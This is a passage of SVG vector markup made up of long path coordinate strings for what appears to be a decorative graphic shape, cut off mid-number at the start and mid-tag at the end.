7-.7-4.5-1.3-1.3.1,3.1,1.1.3.7-4.9-1.3.3-.7,1.5-.9-3.5-.7-.6.3-4.1-.5,0-.1-.9-.3-1.2-.4-.6-.7,1.7-.4,4.7-.3-.8-.4-1.6-.1-3.1-.4,0-.2-.6-.3-1.2-.5a17.85,17.85,0,0,1,4,.3c2.7.4,1,.6,4.4,1.1-1-.6-1.4-.8.6-.8-1-.4-4.6-1-4.5-1.3s2.7.2,2.9,0c-1.6-.4-3.1-1.4-.7-1.4-2.1-.5-2.9-.9-4.5-1.3-.8.4,1.7,1.1-1.6.7a13,13,0,0,0-2.3-.7c0,.3,1.8.6,2.4,1-6.5-1.2-.5.6-2.8.3-1.4-.3-2.1-.5-4.2-.8,3,1.1,4.8,2.4-1.1,1.8,6.1.9,1.9,1.5-2.8.2.3.6,3.1.7,4.5,1.3-2-.3-2.5-.2-5.1-.6-5.9-2-1.8-1.9,2.9-2.1-3.3-1.3-1.1-1.2-2.8-1.9,1.1.2,2.1.3,3.1.5-2.9-.6-1.5-1.5-4.7-1.7,2.7.7,1.1,1.1-1.6.7-1.1-.9,1.2-.9.2-1.8a19.5,19.5,0,0,0,5.1.6c-6.1-1-4.5-1.5-1.3-.8-1.3-1.2,3.1-1.5-.6-3.3,4.1.5,4.1-.2,1.5-1,1.4.2,2.3.4,3.2.6-1.4-.7.9-.4,2.8-.2-3-.9-3.6-.2-5.2-.8a7.88,7.88,0,0,1,3.8-.1c0-.8-3.4-3,.5-3-3.6-1.3-4.9-5.3,1.6-2.7.7-.7-1.2-1.9-1.1-2.4.6.7.6-.1,4.2.7-1.1-.5-1.5-.6.8-.4-4.9-.9,1.4-.5-2.6-1.4,0,.1-.8,0-1.1-.2,2.8.4,2.6.3,6.2.8,2.8.7.8.5,2.5,1.2,3.6.4,3.5.7,6.4,1.3-2.3-1.8-.8-1.4.9-2.3-3.9-.7-1,.4-3.9-.1l-.3-.6c-2-.3-3.5-.5-4.1-.5,3.9.6-.5.3,3.4,1-.8,0-.6.3-4-.3-.3-.3.8-.4-2.3-.8.9.4,1.8.8-.7.5-3.9-1.3.7-1.9-3.6-3.5a4.17,4.17,0,0,0,2.6-.4c2.1.1,4.2.1,6.1.3a9,9,0,0,1,2-.2,3.87,3.87,0,0,0,1.9.3,4.17,4.17,0,0,1-1.1-.3h2.3c-.5.3,1.4.4,1.5.7,6.9.4,16.6.6,21.8,1.2.4-.4-5.3-.5-2.6-.7,2.8.1,2.5.4,5.5.4.6.2.7.5,3.5.5-1.6-.3,2.5-.4-.3-.4h1.3c.2.1.5.1.7.2-.2-.1-.3-.1-.4-.2,1.8-.1,3-.2,5.5-.2.4.4,2.2.6,4.1.7a19.51,19.51,0,0,0,5.5-.3c4.4.2,5.8.5,10.1,1-4.4.3-6.2-.1-10.6-.2-2,.8,13.9.9,10.8.4,2.7.2,2.1.4,1.5.7,3.4,0,1.7.4,4.5.4-.5-.3,0-.4,1.8-.4,1.2.2,1.3.4,2.5.6,7.5,0,9.1.2,18.1.4a16.36,16.36,0,0,1,3.8-.6,42.76,42.76,0,0,0,6.5.2c0,.2.5.3,1.3.5,4.5.2,4-.1,7.3-.1.1.3,1.1.7-.5.9,2,0,2.4.2,4.3.2,1.2-.3-3.5-.7-.5-.8s4,.5,2.5.6c6.2.3,12.7,1.9,18.4.9.4.2,1.7.2,1.4.5,4.7-.1,5.6.1,8.3-.2.4.2,1.9.2,2.3.4,1.1.3-1.3.3-.7.5,7.8.7,22.3.4,14.2-.8a38.38,38.38,0,0,1,6.6.5c-.9.4-2.6.7-2.4,1.2-5.2.3-11.2.6-17.1.6h0a109.94,109.94,0,0,1-14.5-.9c-3.6-.5-.9-.8-7.1-1.1.7.5,2,.7-.4,1,8.7,0,2.4,1.4,6.5,1.9-1.1.1-4.3,0-4,.4.8.2,2.5.4,3.6.6-3,.4.2,1.1-.8,2.1a14.87,14.87,0,0,1-2.2-.2c2.9,1.2-2.9,2.2,4.3,3.4-.4.4-3.2.6-2.4,1.2-3.3-.1-5,0-7.3.1,13.3,1.8,42.6,1.7,42.7-.4,8-.9,11.9-2.1,10.1-3.7,3.1-.1,3.7.2,6.3,0-1.4-.8,1.1-1.2,5.4-1.4-3.2-.1.9-.2-.3-.4-1.6.1-3.9.3-8.2.4,0-1.2-7-1.7-3.8-2.6,9.3.5,12.6,1.4,24.2,1.7,3.1,0,2.5-.5,7.1-.4,0-.2-.5-.3-1.3-.5a38.13,38.13,0,0,0,4-.2c2.9-.3,2.3-.9.3-1.6a.42.42,0,0,1-.2-.1h.34c3.4,0,4.8.1,4.8-.2,3.4-.1,1,.4,4.4.3a8.21,8.21,0,0,1,2.1-.1c-.1-.2-.5-.3-1.4-.5,8.5-.2,8.5-2.7,21.2-1.2,0,.3,1.3.8-.4,1,6.4.3.9.9,5.1,1.4-.3-.8,2.5-1-2.1-1.6,6.7.3,7.9-.3,10.7.3.7-.5,1.7-.7,3.6-.9,1.1.3,2.6-.1,5.3.1-.8.5,2.4.7,4.8,1-4.2.1-5,.6-5.5,1.2a13.54,13.54,0,0,1,3.3.2c-2.2.2-3.7.5-2.5,1,5.3,0,7.9.4,11.7.2,2.8.9,10.5.4,15.4.9-2-.5,2-1-3.1-1.4,3.1-.2,6.4-.3,8-.6-8.6-.2-4-1.4,1.2-1.4-1.4-.4-3.3-.7-4.9-1.1,1.1,0,1.2-.1,2-.1,4.3.2,5.4.6,5.8.9-.3-.2.9-.2,3-.2-.7-.3-3-.8.6-.8,1.6.3.1.8,2.6.7-2.5-.6,3.7.2,6.2-.2,2.7.3.4.7.6,1,2.8.2,3.3,0,4.3.2-.5,1.1,2.1,1.9,1.7,2.5.7-.4,5.2.1,5.5.4-4.3,0,1.5.6-1.6.7-2.7-.3-1.9-.4-1.6-.8-3.3-.2-3.6,0-6.5-.2-1.4.4,4.6.1,4.5.4s.7.4-.8.4c-1.7,0-1-.3-3.3-.3.3.5-1.8.5-6.1.3-.2.3-.8.2-2.8.5,2,.1,2.3-.1,4.2,0,1.2.2,1.3.4,2.5.6-1.8-.3-6.3.2-2.8.5l3-.3c.5.6-4.6.6-1.4,1.1.2-.1,2.2-.1,3-.2-2,.2.1.7,2.6.8-.5-.3-2.6-.5.7-.5,2.6.6,12.9.1,7.1-.3,1,.9-9.5-.2-2,.2.7-.3-3.6-.2-3.5-.5,11.5,0,5.9.8,13.4,1.3-2.1-.3-3.3-.7-.6-.9,9.6.1,15.1-.6,15.7-1.3h.3c.8.3,4.2.3,6.6.5-.6-.5,2.1-.4,7.1-.4-2.2-.4-2.7-.5-.5-.8-1.5-.2-5.2-.2-5.5-.4.5-.3,1.5-.8,5-.4-1.6-.5.8-1-5-1.3a15.32,15.32,0,0,1-1.9.3c-.1-.1-.1-.2-.2-.3-7.8.5-16.3-1.3-8.3-1.5-.1.1.4.8,1.3.5q-1.2-.45,3-.3c-1.6.1.8.5,3.6.6-1.4-.5,1.3-.5,2.7-.6-5-.6-3.1-1.6-7.9-2.5a27.31,27.31,0,0,0,3-.2c.2.2.1.4,2.4.4.6-.6-3.6-.8-4-1.3,3.2,0,4.4-.3-.1-.2-1-.5-.2-.8,4.9-.6a24.64,24.64,0,0,0,3.7.8c.6-.3,3.2-.3,3.8-.6,1.8,0,.8.3,2.3.4,2.5-.3-.1-.4-2.3-.6a9.16,9.16,0,0,0-2.6-.4c-.1-.1-.2-.3-.3-.4,1.6,0,3.9.1,4.2,0-4.1-.1-5.7-.2-7.6-.4-.5-.3,3-.1,3-.3-1.3,0-1.3-.2-1.3-.4-2.5-.1-6.9-.6-6.3,0,2.5.2,3.8-.2,4.2.1.7.4-2.5.3-4,.4-2.9-.3.4-1-.9-1.3,0,.2-2.6.1-2.2-.2,3.2,0,3.3.3,6.4.2.6-.5-2.2-.7-2.8-1,1.4,0,1.4-.1,3.1,0,1.8.4-4.4-1.2-6.3-1.7h.4c2.4.3,1.8.5,3.3.8,2.1-.1,1.1-.4.1-.7,1.6.1,3.6.2,4.9.4,1.1.3-2.8.5.5.8-.4-.4,1.1-.6,3-.7.4.1.8.1,1.1.2,1.3.3,5.2.2,7.4.6-.8.2-7.4.7-4.8.7a8.21,8.21,0,0,1,2.1-.1c.1.1.1.1.1.2-.4,0-.7.1-.6.1h.5a3.36,3.36,0,0,1-.6.3c-.7-.1-1.5-.1-2.6-.2,1.7.7-4,.9.2,1.7h2.3a4,4,0,0,1,.5.1c0,.1.1.1.1.2-1.3.1-1.1-.1-3.7-.1-.7.3,1.8.3,3.9.3.9.7,2.7,1.3-1.4,1.6,4.5.4,2,1.2,7,1.6,0-.3.4-.6.4-.9.8-.1,1.5-.1,2.3-.2h-2.4c-.1-.2-.4-.3-1-.5a16.21,16.21,0,0,0,2.2-.2,8.1,8.1,0,0,0,2.2,0,2.08,2.08,0,0,1,.7.1c0-.2,2.5-.2,5.2-.1,1.2-.5.7-1.1,3-1.8-3.8-.1-1.8.5-6.1.3-.2-.1-.2-.1-.1-.1h.4a5.6,5.6,0,0,0,.7-.2,3.88,3.88,0,0,0,.9-.1h-.7a3.25,3.25,0,0,0-1.3-.3,23.14,23.14,0,0,1,3,.2c.3-.3,3-.8.3-1.1.1.3-1.7.3-2.8.5-7-1.2,7.3-1.1,12-1a11.71,11.71,0,0,1,3.8-.6c4.6.1,1.8.9,6.9.9,1.2-.2-4.4-.4-1.3-.5a12.28,12.28,0,0,0,2.9.2,4.76,4.76,0,0,0,.7.3h-.1c-.1.2.5.3,1.5.3.6.1,1.4.3,2.1.4-.4-.1-.5-.2-.4-.3,2.7.1,6.1.1,6.8.4-.6.1-1.9.5,1.4.6,2.9.1-1.4-.6,2.9-.4,1.8,0,.8.3,2.4.4.7-.3,2.8.2,5.3.1.2-.3-.8-.7,3.8-.7-5.8-.1-3.6-.4-7.5-.2a15.33,15.33,0,0,1,5.1-.2c-1.2-1.1,1.3-1.8-.8-2.7,3.2-.1,4.3-.4,8.1-.4,2.5,0,1.6.3,2.8.5-.4.1-.6.1-.9.2a3.7,3.7,0,0,1,1.1-.1h.5a12.27,12.27,0,0,1,2.1,0,2,2,0,0,1,.9-.2c1.5,0,3.3,0,5.4.2-3.6-.3-2.1-.4-1-.6-1.2.5,4.7.4,5.3,1a16.09,16.09,0,0,0-2.5.1,12.35,12.35,0,0,0-1.7-.3c1.2.5-5.7.7-1.9,1a24.26,24.26,0,0,0,3.3-.2,9.78,9.78,0,0,0,1.3.3c3.1-.3,0-.9,4.7-.9-.3.3-.1.8,3.8,1-.3-.6,3.4-.7,5.6-1,.9.2-5.2,1.5-.9,1.8,1.9-.7,6-.9,12-1,1.3-.3-3.3-.6-.4-.7-.4.5,5.4-.2,1.8-.4.3.3-5.3.1-5.4-.2a45.71,45.71,0,0,0,7.4,0c-.3-.8-1.3-1.4-4.4-1.9.7.3-1.5.4-.1.6.1,0,.1.1.2.1-4.1.2-7.2,0-9.8.4-1-.5-.1-.5-2.6-.8,2.3,0,3.6.4,3.1,0-5-.4-2.8-1,.2-1.3a31.61,31.61,0,0,1-5.2-1.7h1.3a3.54,3.54,0,0,1-1.2-.7,21.48,21.48,0,0,1,3.4-.2c-.1-.2-.7-.3-1.3-.4-1.2-.4-.4.1-2.2.1a.68.68,0,0,1,.5-.4c1.5-.1,2.7-.2,1.3-.3a.87.87,0,0,1-.5-.1,53,53,0,0,1,5.4-1.3c-6.7-.2-4.6.5-9.1.5-.2-.1-.5-.2-.7-.3,1.9-.1,1.8-.3,1.1-.7,4.8.1,5.9-.1,8.2-.1-9.7-.7-4.3-1.6-1.9-2.1a21.47,21.47,0,0,1,3,.3c1.3-.6.9-.9-2.2-1.2.2,0,.3-.1.5-.1,1,.1,2.4.1,3.8.1-1.3.1-2.6.5.9.6-.5-.3,4.1,0,2.9-.4-.3-.1-1.2-.1-2.1-.2a9.89,9.89,0,0,1,2.3.2c.1.6,3.1,1-.2,1.3-2.3-.1-1.1-.3-3.1-.4l.4.4c1.7.1,2.7.1,3.5.1-.4.2-2,.3-4.9.1.3.3,4.8.9,5.5.4-5.2-.3,1.6-.1,2-.2-1.8,0-1.1-.2-1.2-.3a20.13,20.13,0,0,1,2.2.1c-1.5-.4-1.8-.8-1.6-1.1a23.62,23.62,0,0,1,4.2.4c-.2.1-.3.3-.4.4a15,15,0,0,0-2.5.2h2.7c.1,0,.2.1.3.1-.2,0-.2-.1-.3-.1,2.5,0,2.8.2.5.2,5,.1.8.5,4.5.5,2-.5-3.3-.7-.7-1.1,4.8.7,2.1,1.4,10.7,1.9.3.4.2.6-.2.8h-.2a10.52,10.52,0,0,0-2.9,1.5c3.6.1,5.4,0,5.3-.3-3.3-.1-1.8-.4-1.1-.7.8.2.7.6,1.4.7,4.3.2,3-.3,7.3-.1-.6-.2-2.7-.6.4-.6.1.1.3.1.7.2,1.2.5-.8.9,1.6,1.4,1.4-.2,4.1.5,5.7.7a12.27,12.27,0,0,1,2.1,0c.3-.2,2.1-.3,2.8-.5,1.7.5,2.4-.1,5.2,0,1.8.1.1.5,3.5.5.9-.2,3.1-.8-.6-.9-.1.6-7.2-.1-9.7-.4,5.2-.2-.3-1.2,7.6-1.3-1.5-.1-3.3-.2-4.5-.4,1.5-.5,2.8-.8,8.2-.4-.4-.3,1.4-.3,2.9-.4,1.2.2,1.7.9-1.5.8.3.3,2.2.4.4.6,2,.2,4.4.4,6.7.6-1.8.5,2,.6.7,1,1.9,0,3.8.1,5.7.1.4.2-1.8.2-2.6.3,2.1.3,4.1-.1,5.8.2.6.5-.5.3-2.7,0-.7.4,7,.4,6.2.8-9-.3,1.2.6-5.1.5a11.33,11.33,0,0,1,2.6.3v.1c-.1,0-.2.1-.4.1h-1.7c1.8.5-2.8.2-1.8.5a26.2,26.2,0,0,0,2.8.1c1.9.1,2.1,0,2-.1.5,0,1-.1,1.3-.1a6.42,6.42,0,0,1-1.8-.2.3.3,0,0,0,.2-.1c.4,0,.9.1,1.5.1h.1c.7.1,2.3.1,2.7.2,3.5,0,7.9,0,9.5-.2-9.3-.2,1.1-.3-3.4-.7a13.45,13.45,0,0,0,4.2,0c-3.2,0-1.9-.4-4.5-.4-.4.2-.1.5-3.9.3-1.3-.5-1.1-.9,0-1.2a50.79,50.79,0,0,1,7.8.2c-.5-.3.1-.5,2.9-.4.1-.2-1.4-.3-1.4-.5h4.2c.9.4,5.3.5,10,.9a7.88,7.88,0,0,1,2-.1c-3.2-.5,3.2-.4-1.6-.8a73.05,73.05,0,0,1,8.5.2c-1.3.1-1.1.4,1.4.5-.6-.4-1-.8-5-1.2a8.17,8.17,0,0,0,1.3-.2c1.6.1,3.4.1,4.9.2-.2.3,3,.2,2.5.6-.6,0-1.1.1.1.1,0-.1.1-.1,1-.1.3.1.2.2,1.2.2-1-.4,1.6-.3.6-.6-2,0-3.4-.1-4.6-.2,2.2,0,3.8,0,3.4-.2h-4.2c1.5-.2,1.2-.4-.6-.7,4.3.2,2.4-.6,6.2-.2.8-.4-4.8-.2-4.5-.5a7.35,7.35,0,0,0,2.4-.5h.5a8.34,8.34,0,0,1,1.8-.2c1.6,0,3.5,0,3.5-.2a21.47,21.47,0,0,1-3-.3c.4.2.3.3-.4.3a13.35,13.35,0,0,1-2,0h0c.1-.2,0-.5-.4-.7.8,0,1.7.1,2.5.1,5.8.2,10.1.4,8,1-7.2.1-3.4.6-1.7,1.3-1.9,0-3.1-.1-4.3-.2-.3.2-3.5,1.1,2.5,1.3,3.1.1-2.1-.3-.5-.6,4.6.2,1.6-.3,5.4-.2,2.3,1-.5,1.1-7.4,1,.5.7-1,1.1-2.1,1.8-.5.3-.9.6-1,1.1h.9c2.7.1,4.2-.2,4.8.1-2.2.3,1.1.5.9,1a12.82,12.82,0,0,0-4.1,0c5.1.5-4.5.4,3.4.7a34.87,34.87,0,0,1-5,.3h-1.7c.5,0,1.1.1,1.7.1,1.9.1,4.1.2,5.5.3.7.3.2.4-.9.5,2,.2,5.3.2,7.3.4-1.5-.5,2.6-.4,5.2-.4.6-.3-1.6-.4-2-.5.1,0,.2-.1.3-.1,1.8,0,3.6.1,5.4.1,1,.4-3,.4,1.9.6,5.1-.3-10.1-1-4.2-1.6-.6.6,3.8.2,6,.5-1.3-.7,12.9-1.8,13.5-.5,4.8.2,5-.1,5.3-.3-3.6,0-5.1-.2-4.6-.4-2.5-.1-8.2-.1-8.6-.3.9-.3,2.1-.6-2.2-.9,6-1.7.7-3.9,1.8-5.9,1.4.5,1.4.5.8.9,8.2.2,3.8.7,4.9.8,1.1-.3,1.7.4,4.3.1,1.6.9-.8,1.5,6.1,2.2-.5-.9,9.1.5,8.3,0-8.8-.6-7.4-1.3-3-1.8-1.7-.1-4-.1-4.4-.2,4.9-.2,5.3.5,7.7.8a45.25,45.25,0,0,0,4.6-1.1c2.2.1,4.6.3,4.6.5-1.1.4-2.8.2-.7.7-1.9,0-3.1-.1-4.3-.2-.1.3,3.5.4,3.4.7-2.4-.1-4.7-.1-7.1-.2a60.26,60.26,0,0,1,11.1,1.6c2-.7,13.6-1.2,8.1-1.9,2.4,0,8.4-.1,9.8.1-3,.4-4.4.3-.5,1-1.8,0-2.1-.2-4.4-.2.7.9-9.7.2-8.8,1.1,2.5.2,6.1.4,7.6.7.7-.3,6.6.1,7.2.3-2.7.1-3.5.3,1.6.3-3.1.4-.1,1.3-5.7,1.4-3.3-.1-4.3-.3-8.6-.3-4.3-.7-2.4-1.6-3.5-2.4-2.6,0-4.7,0-5.5.1,3.1,0,4.6.2,4.5.4-3.2,0-3.7,0-7.1-.2.5.3.8.5-2.3.5l-.4-.4c-7.1-.2-9.4.6-7.5.9a31.43,31.43,0,0,1,4-.2c.5.2,2.5.2,3.1.4-.8.4-4.8,0-6.8.2,4,.3-3.2,0-2.6.2,2.1.1,4.6.3,4.6.5-2.1,0-5.3-.2-5.6,0,11.8,1.3-6.6,1.6,4.1,3a30.21,30.21,0,0,0-5.2.4c5.3.1,7.7-.1,12.5,0-.7-.5-2.3-1.5,4.1-1.7.5.2,3.7.8-.6.9,2.1.1,5.2.1,5.8.2-2.2,1.1,5.1,2.9.6,3.8.2-.2,6.2.1,6.9-.1-5.9-.5-4.6-1.1.2-1.3-5.2-.8-3.5-2-5.2-2.7,7.9.1,8.8-.8,14.8-.5.6-.3-2.6-.9.5-1,.6.3,4.8.4,6.2.7,1-.2,2.9-.4,2-.8,3.6.1,4.6.3,5.6,0-1.1-.9-3.9-2,4.6-2.7,8.2.3,4,1,6.8,1.5,2.4-.4.1.5,3.2.5,0-.3,8.6-.1,9.9.2-1,.2-3.1.3-8.2.1.4.3.8.6,4.7.7-3.1-.7,7.4.1,6.8-.2-2.1-.1-3.6-.3-4.5-.4,8.3.2.3-.6-2.1-.8,4-.2-6.2-1.7,2.4-2,2,.4,3.5.7,2.2.9,5.9.2,9,.6,10.7,1.1-2.7.2-2.8-.1-5.8-.2.9.3,9.2.9,2.3,1a17.36,17.36,0,0,0-4.6-.5c4.6.7,13.6,1.5,14.3,2.1a52.3,52.3,0,0,0,5.6,0c3.1,1.1,11.6,2.3,3.7,2.6,1.2.4-.9,1,2.5,1.3.9-.4,7.8-.2,6.5-.5,2.2.4,5.5.8,9.3,1.1-4.1,0-.6.8-3.4.9-3.8,0,.5-.5-3.2-.5-8.7.9.3,3.1-7.5,4.1-4.3-.3,3.2-.9-3.8-1.2-3,.3-.9.9-4.3,1.4-5.2,0-6.4-.3-6.2-.7,8.4.2,2.8-1.4,13.3-.7-3.7-.6-4.9-1.3.1-1.5-.8-.2-5.6-.2-4.7-.5a33.79,33.79,0,0,1,4.5.3c-6.7-.7-2.8-2.7-10.1-3.6,2.6,0,4.7,0,5.5-.1-3.4-.1-4.1-.5-7.5-.6,1.9.4-2.7.3-3.8.5,2.1.1,5.3.7,2,.7s-1.9-.4-4.6-.4c-.3.1.2.2-1.2.2a4,4,0,0,0-1.6-.3c0,.5,9.4,1.3,2.7,1.5,1.1-.4-5-.3-6.1-.6,2.9-.4-2.6-1.4-4.2-1.6,2.1.7-7.4.4-9.1.8-2.4-.5,3.7-.1,2.4-.5a97.88,97.88,0,0,0-13.7.2c.7-.3-3.1-.3-4.5-.4-2,.2.6.9-6.6.4-.2.3,2.3.9-2.1.8-3.1-.3-.3-.9-6.5-1,18.3,2.3-19.2,2.2-5.9,4.3-6.7-.3-6.1.1-8.1.3-5.3-.3-9.4-.7-13.5-1.1,2.5-.2-.1-.3-.5-.6,2.2-.3,5.6.2,5.4-.2a52.3,52.3,0,0,0-5.6,0c-1.2-.5.7-.6,1.6-1.4-5-.3-5.1-.6-10.2-.6,2.6.8-2.7,1,4.4,1.8-3.1-.3-14.6,0-6.6.4.1-.2-.9-.4,1-.4,2.1.1,5.2.1,5.8.2-1,.4,5,.9-2.1.7,1.7-.1,1.5-.4-1.8-.5.2.4-2.6-.1-4,.2,4,.4,5.1,1.3,1.3,1.4-1.4,0-2.8-.1-4.3-.1,2.5-.4-10-1-3.3-.6-3.1.7,9.5,1.4,13.9,1.6.9.3-5.2,0-5.4.2,6.5.2,7,.7,10.7,1.1-.8-.2,4.9-.3,5.6,0-2.3.6,1.7,2-3.4,2.4-2.6-.2-4.7-.5-5.7-.1,9.8.3-1.9.9,2.5,1.3,4.9.2,1.4-.4,6.8-.2-.9.5,6.7.5,7.8.9-4.8.3-2.5,1.8.6,2.3,4.7-.1-2.1-.7,3.6-.7,3,.3,8.9.3,11.6.6-1.6.2,1.3.8,3.7,1.1a11.3,11.3,0,0,1,5.6,0c2-.9-3.5-1.5-2.2-2.4a55.5,55.5,0,0,1-5.9-.4c2.4,0-.6-.5,2.4-.5,5,.1,2.3.7,7.7.8.8-.3-5.6-1.4,1.8-1.2-.2-.2-.3-.4-.5-.6-9.9-.2-5.9-1.5,2-.9.9-.5-2.2-1.4,5.9-1.2-2.6.6-1.5,1.2,3,1.8.4-.2,3.9-.1,2.3-.5a19.43,19.43,0,0,1-4.5-.4c3.3,0,.9-.5,3.8-.5a66.19,66.19,0,0,0,6.9-.1c4.6.6-.7,1.1-1.5,1.5,5.6.2.7-.6,5.1-.5,2.3.1,1.1.3,3.1.4,3.1,0-1.4-.8,2-.8,2,.3,1.6.8,6.4.9a56.21,56.21,0,0,1-6.2.8c5-.1,6.4.7,14.8,1-5.7-.7-13-1.6-3-1.8-2.2-.6-3.4-1.5,1.3-1.7a68.57,68.57,0,0,0,7.7.8c5.8-.1-4.8-1-1.1-1.2.3.1.6.3,3,.3.1-.3-3-.4-4.7-.7a50.7,50.7,0,0,1,9.7,0c-4.4,1.2,1.3,2.6-6.4,3.8-3.3-.9,6.9-1.6-3.4-2.3,4.2.6-3.8.6,2.3,1-2,.4-8.3.3-4.8.9-1.6-.4,3.6,0,4.2.1a5.61,5.61,0,0,0-2.1.7c7.5.2,4.3,1.1,12.3,1.4-9-1.3.3-2.2,5.8-2.9-2.4-.4-5.6.1-7.2-.3a31.43,31.43,0,0,1,4-.2c7.3.5,5.3.1,12.4,0,2.9.7-6.4.2-6.4.6,1,.3,7.4.9,5.1,1a26.88,26.88,0,0,1-3.1-.3,17.67,17.67,0,0,0-2.4.4c3.2,0,5.4.1,5.9.4-7-.1-11.7,0-12,.6a41.15,41.15,0,0,1,4.3.1c-2.9.3-2.3.9-5.9,1.2,4.8.3.3.5,3.6,1-6.5-.2,1.2,1-4.8.9,1.1,0,1.7.1,1.6.3,14,.5,3.4-1.4,11.2-1.5-.4.6,3.3.5,4.4.2,7.8,1-10,1.5-1.2,1.8-.2.3-7.2.8-3.5.8,1.9-.5,1.1-.1,7,0,2.9,0-3.7-.8.6-.9,2,.1,1.6.8,3.2.5-1.4-.5-.2-.5-3.5-.8,1.5-.1,5.2-.1,6.8-.2-1.2-.2-6.9-.1-6-.5,15.1.2,5.5-1.5,12.2-1.9,5.5,1.7,2,3,3.6,4.1a9.07,9.07,0,0,1,2.8.1l.3.3c-3.3-.1-5.4-.1-7,0,3.6.5-2.9.4-3.5.8,4,.9,2.2,3-1,3.6-.2.5,3.4,2.5-5.9,2.8,2.1.1,5.2.1,5.8.2a31.08,31.08,0,0,0-5.1,2.1c1.9.1,5.4,0,5.8.2-1.2.2-5.1.1-6.7.3,9.3.8-4.7,1.1,1.8,2,6.9,0,1.8-.4-.4-.4a3.93,3.93,0,0,1,2.3-.5c.2.5,2.2,0,4.3.1,1.8.2,1.9.3.4.4,11.2.3.2-1.1,0-1.6s10.4,0,9.1-.7a35.62,35.62,0,0,0-4,.1c-2.2-.5-5.6-1.2.1-1.4,1.2.4,6,.2,5.5-.1-3.5-.3-1.7-.4-5-.9,6.9.5.7-.6,8.3,0-.5-.6-4.2-.3-6.2-.7,5.6-.2-1.1,0-1.8-.5,2.8,0,2.5-.3,5.6,0,.6-.6-4-1.1-1.3-1.4-2-.2-4.4-.3-6-.5,1.5-.4,2.9-.8,1.5-1.5,10.8.3,8.9-1.4,16.6-1.7-1.7-.1-4-.1-4.4-.2.2-.3,8.2,0,3.8-.5-4.9-.2-1.4.4-6.8.2-1.9-.6-6.4-1.7-3.4-2.3-1.4.3,5.5.7,6.1.6-2.4-.3-6-.6-6.5-1,1.9.2,5.3.2,7.3.4,1.4-.6-2.8-1.3-1.5-1.7,1.6.1,2.3.2,3,.3,2,.8-3.9,1.9,3.6,2.5-2.8-.8,3.8-1.7-1.1-2.8,7.9.2-4.54-1.69,4.66-1.79-7-1.1-4-2.51.24-3.41V0Z\"></path>\n        <path d=\"M1739.6,46.7c-1.3-.4.4-.6,2.1-.7-4.5-.2-8.8-.4-11.7-.7A94.06,94.06,0,0,1,1739.6,46.7Z\"></path>\n        <path d=\"M1838.7,75.8c3.8-.5,1.4-.8,4.5-1.2-4.6,0-5.9,1-7.6,1.1C1836.6,75.8,1837.7,75.8,1838.7,75.8Z\"></path>\n        <path d=\"M1862.2,72.5c-2.3.1-8.6.3-5,.7C1856,72.7,1864.7,73.1,1862.2,72.5Z\"></path>\n        <path d=\"M1718.3,65.2c1.8.6.3.8,1.4,1.6,3,.2,7.5.6,7,0-1.6-.1-5.3-.3-6.2-.7,3.6-.3,3-1.2,1.2-1.8-2.2.2.3.1.4.4H1718c-3-.5-4.1-1.1-8.5-1.7-.1-.6,7.4-.1,7.6-.8-8.7-.3-7.1-.8-6.9-1.5,1.4,0,2.9.1,4.3.1-4-.5,1.6-.6-5.4-1.3h4.2c4,.3,7,2.2.1,1.7,5.1.9,9.1,1.5,4.8,2.3,2.5,0,5,.4,5.7.1-2.5-.5-3.2-1.1.1-1.4-7.8-.4-5-1.3.1-1.4,0,.3.2.5,3.3.6,4.2-.5,5.8-.7-1.3-1.4-1,.3,5,.9.9,1-2.1-.1-3.6-.3-4.5-.4,3.2-.2,1.8-.3.7-.7,6.2.2,3.5-.3,6.6-.4-3.1-.3-5.9.1-7.3-.4,1.3-.4-3.9-.9,1.8-1.2,2.3.2,2.9.5,6.2.7.4-.4-5.3-.4-4.9-.8,3.8.1,3.5-.2,3.9-.3-5.2-.7-1.8-1.5-8.8-2.2,2.6-.1,1.5-.5,3.6-.6-.2.2.7.4,3.2.5-5.6-.8,1.1-1.6-8.4-1.7-1-.5,7.9-.5,3.3-1-.3.1.1.2-1.2.2.1-.2-1.8-.3-1.8-.5,6.1,0-2.4-1.2,4.4-1.3-5.8,0-3-.5-6.2-.7-2.9.6-4.4,1.4-6.6,2-3.2-.8-2.7-1.2-3.2-2,2.4,0,6.1.8,5.8.2-9.1-.6.1-1.1-5.7-1.8-1.1.4.3,1.1-5,1.1h-2.4c1.2,0,2,.1,2.4.1.7.1.5.1,0,.1-1,.1-3.4.2-3.4.3,1.6.1,2.7.1,3.4.2,3,.3-.8.9,2.3,1.4h-2.3c-1.8,0-1.2.2,0,.4l1.6.3a7.82,7.82,0,0,1-1.6-.1c-4.9-.1-3,.4-6.4.4a35.32,35.32,0,0,1,6.4.7c1.3.3,1,.5,0,.8-1.7.4-5.2.7-6.7.9,1,0,4.1.3,5.5.4-.2.3-10,.1-5.1.5,1.4-.1.1-.4,3.9-.2.5.4,1.4.8-2,.8a32.58,32.58,0,0,1,4.3.4c.2,0,.4.1.4.2s-.2.1-.4.1a23.8,23.8,0,0,1-4.3.3c1.2.1-1.7.7,1.3.5,1.1-.1,2.1-.2,3-.2,4.4,0,4.4,1.6-.1,2.1a29.32,29.32,0,0,1-5.3.1c.8.2,3.7.4,5.3.5a3.78,3.78,0,0,1,1,.2,3.07,3.07,0,0,0-1,.1,44.23,44.23,0,0,1-6.9.5c.5.6,5,1.1-.2,1.3a54.5,54.5,0,0,0,7,0h0c1.7.3,4.7.7.6.8-.2,0-.4-.1-.7-.1a22.83,22.83,0,0,0-6.6-.3c3.7.3.7,1.2-.3,1.2,1.5.3,4.4.1,6.9.2h.2c.9.3,4.1.5,6.3.8-1.3.1-2,.3-3.9.4-1-.1-1.8-.2-2.6-.3-1.1-.2-2.1-.3-3.7-.5,3.1.5-2.2.5.9,1,1.1.1,2,.1,2.8.1a10.84,10.84,0,0,1,2.9.1c-.6.5-3.9.5-2,.9,1.9,0,3.8.1,5.7.1.5-.5,0-.7.4-1.1,2.1,0,5.3.2,5.6,0C1711,66,1709.7,65.1,1718.3,65.2Z\"></path>\n        <path 